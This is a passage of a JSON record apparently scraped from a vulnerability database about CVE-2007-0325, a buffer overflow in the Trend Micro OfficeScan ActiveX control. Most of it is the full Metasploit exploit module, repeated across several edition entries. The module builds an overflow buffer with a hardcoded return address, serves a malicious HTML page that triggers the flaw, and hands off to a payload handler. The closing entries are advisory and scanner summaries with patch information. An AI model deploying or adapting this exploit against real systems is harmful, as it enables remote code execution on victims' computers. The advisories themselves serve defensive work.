],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2018-02-02T18:14:12", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": 10.0, "modified": "2018-02-02T18:14:12"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 18, "lastseen": "2018-02-02T18:14:12"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2018-02-03T02:08:13", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": 10.0, "modified": "2018-02-03T02:08:13"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 19, "lastseen": "2018-02-03T02:08:13"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2018-02-26T19:04:48", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": 10.0, "modified": "2018-02-26T19:04:48"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 20, "lastseen": "2018-02-26T19:04:48"}], "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "published": "2007-08-31T11:58:31", "references": [], "reporter": "Rapid7", "_object_type": "robots.models.metasploit.MetasploitBulletin", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "modified": "2017-07-24T13:26:21", "href": ""}

{"result": {"cve": [{"id": "CVE-2007-0325", "type": "cve", "title": "CVE-2007-0325", "description": "Multiple buffer overflows in the Trend Micro OfficeScan Web-Deployment SetupINICtrl ActiveX control in OfficeScanSetupINI.dll, as used in OfficeScan 7.0 before Build 1344, OfficeScan 7.3 before Build 1241, and Client / Server / Messaging Security 3.0 before Build 1197, allow remote attackers to execute arbitrary code via a crafted HTML document.", "published": "2007-02-20T12:28:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0325", "cvelist": ["CVE-2007-0325"], "lastseen": "2016-09-03T08:17:47"}], "saint": [{"id": "SAINT:C96CB693A14BF8B4DB8F59FA09D7491E", "type": "saint", "title": "Trend Micro OfficeScan client ActiveX control buffer overflow", "description": "Added: 02/21/2007 \nCVE: [CVE-2007-0325](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0325>) \nBID: [22585](<http://www.securityfocus.com/bid/22585>) \nOSVDB: [33040](<http://www.osvdb.org/33040>) \n\n\n### Background\n\n[Trend Micro OfficeScan](<http://www.trendmicro.com/en/products/desktop/osce/evaluate/overview.htm>) is a centralized virus and security scan management system. \n\n### Problem\n\nThe OfficeScan Web-Deployment SetupINICtrl ActiveX control, which is vulnerable to buffer overflows in multiple methods, is automatically installed on any client which uses the web-based administration console. Exploitation of these buffer overflows by a malicious web page leads to command execution. \n\n### Resolution\n\nUpgrade to OfficeScan 7.0 Build 1344, OfficeScan 7.3 Build 1241, or Client/Server/Messaging Security 3.0 Build 1197. For more information see [Trend Micro solution ID 1034288](<http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034288>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/784369> \n\n\n### Limitations\n\nExploit works on the ActiveX control which comes with Trend Micro OfficeScan Corporate Edition 7.3. A computer with the vulnerable ActiveX control must load the exploit page in order for the exploit to succeed. The vulnerable ActiveX control is installed if the computer has previously accessed the following URL where _OfficeScanServer_ is the IP address of the OfficeScan server: \n\n> http://OfficeScanServer:8080/ \n\n### Platforms\n\nWindows 2000 \nWindows XP SP0 / Windows XP SP1 \nWindows XP SP2 \n \n\n", "published": "2007-02-21T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/trend_micro_officescan_activex", "cvelist": ["CVE-2007-0325"], "lastseen": "2017-01-10T14:03:43"}, {"id": "SAINT:363AD88632C87CA33972EA62E7182E12", "type": "saint", "title": "Trend Micro OfficeScan client ActiveX control buffer overflow", "description": "Added: 02/21/2007 \nCVE: [CVE-2007-0325](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0325>) \nBID: [22585](<http://www.securityfocus.com/bid/22585>) \nOSVDB: [33040](<http://www.osvdb.org/33040>) \n\n\n### Background\n\n[Trend Micro OfficeScan](<http://www.trendmicro.com/en/products/desktop/osce/evaluate/overview.htm>) is a centralized virus and security scan management system. \n\n### Problem\n\nThe OfficeScan Web-Deployment SetupINICtrl ActiveX control, which is vulnerable to buffer overflows in multiple methods, is automatically installed on any client which uses the web-based administration console. Exploitation of these buffer overflows by a malicious web page leads to command execution. \n\n### Resolution\n\nUpgrade to OfficeScan 7.0 Build 1344, OfficeScan 7.3 Build 1241, or Client/Server/Messaging Security 3.0 Build 1197. For more information see [Trend Micro solution ID 1034288](<http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034288>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/784369> \n\n\n### Limitations\n\nExploit works on the ActiveX control which comes with Trend Micro OfficeScan Corporate Edition 7.3. A computer with the vulnerable ActiveX control must load the exploit page in order for the exploit to succeed. The vulnerable ActiveX control is installed if the computer has previously accessed the following URL where _OfficeScanServer_ is the IP address of the OfficeScan server: \n\n> http://OfficeScanServer:8080/ \n\n### Platforms\n\nWindows 2000 \nWindows XP SP0 / Windows XP SP1 \nWindows XP SP2 \n \n\n", "published": "2007-02-21T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/trend_micro_officescan_activex", "cvelist": ["CVE-2007-0325"], "lastseen": "2016-12-14T16:58:07"}, {"id": "SAINT:A63A5267BA9B131DA4796E297445F63D", "type": "saint", "title": "Trend Micro OfficeScan client ActiveX control buffer overflow", "description": "Added: 02/21/2007 \nCVE: [CVE-2007-0325](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0325>) \nBID: [22585](<http://www.securityfocus.com/bid/22585>) \nOSVDB: [33040](<http://www.osvdb.org/33040>) \n\n\n### Background\n\n[Trend Micro OfficeScan](<http://www.trendmicro.com/en/products/desktop/osce/evaluate/overview.htm>) is a centralized virus and security scan management system. \n\n### Problem\n\nThe OfficeScan Web-Deployment SetupINICtrl ActiveX control, which is vulnerable to buffer overflows in multiple methods, is automatically installed on any client which uses the web-based administration console. Exploitation of these buffer overflows by a malicious web page leads to command execution. \n\n### Resolution\n\nUpgrade to OfficeScan 7.0 Build 1344, OfficeScan 7.3 Build 1241, or Client/Server/Messaging Security 3.0 Build 1197. For more information see [Trend Micro solution ID 1034288](<http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034288>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/784369> \n\n\n### Limitations\n\nExploit works on the ActiveX control which comes with Trend Micro OfficeScan Corporate Edition 7.3. A computer with the vulnerable ActiveX control must load the exploit page in order for the exploit to succeed. The vulnerable ActiveX control is installed if the computer has previously accessed the following URL where _OfficeScanServer_ is the IP address of the OfficeScan server: \n\n> http://OfficeScanServer:8080/ \n\n### Platforms\n\nWindows 2000 \nWindows XP SP0 / Windows XP SP1 \nWindows XP SP2 \n \n\n", "published": "2007-02-21T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/trend_micro_officescan_activex", "cvelist": ["CVE-2007-0325"], "lastseen": "2016-10-03T15:01:58"}], "exploitdb": [{"id": "EDB-ID:16535", "type": "exploitdb", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow. CVE-2007-0325. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16535/", "cvelist": ["CVE-2007-0325"], "lastseen": "2016-02-02T00:05:14"}], "osvdb": [{"id": "OSVDB:33040", "type": "osvdb", "title": "Trend Micro OfficeScan OfficeScanSetupINI.dll SetupINICtrl ActiveX Multiple Overflows", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034288\nVendor Specific News/Changelog Entry: http://www.trendmicro.com/ftp/documentation/readme/osce_70_win_en_securitypatch_1344_readme.txt\nSecurity Tracker: 1017664\n[Secunia Advisory ID:24193](https://secuniaresearch.flexerasoftware.com/advisories/24193/)\nFrSIRT Advisory: ADV-2007-0638\n[CVE-2007-0325](https://vulners.com/cve/CVE-2007-0325)\nCERT VU: 784369\nBugtraq ID: 22585\n", "published": "2007-02-12T09:33:54", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:33040", "cvelist": ["CVE-2007-0325"], "lastseen": "2017-04-28T13:20:29"}], "nessus": [{"id": "TRENDMICRO_OFSCAN_BUFFER_OVERFLOW.NASL", "type": "nessus", "title": "Trend Micro OfficeScan OfficeScanSetupINI.dll Remote Buffer Overflow", "description": "The remote host is running Trend Micro Antivirus, a commercial anti- virus software package for Windows.\n\nThe remote version of the installed antivirus is vulnerable to a remote buffer overflow attack.\n\nThe issue exists due a vulnerability in the ActiveX control installed by the OfficeScan server during a web install of the OfficeScan clients. The clients cache this ActiveX control, which can be exploited by a malicious website. The attacker can trigger this issue by enticing a user to click on a malicious link or sending the link in an email and urging the user to click on it. Successful exploitation of this issue might result in arbitrary code execution.", "published": "2007-02-21T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=24683", "cvelist": ["CVE-2007-0325"], "lastseen": "2018-07-01T13:56:28"}]}}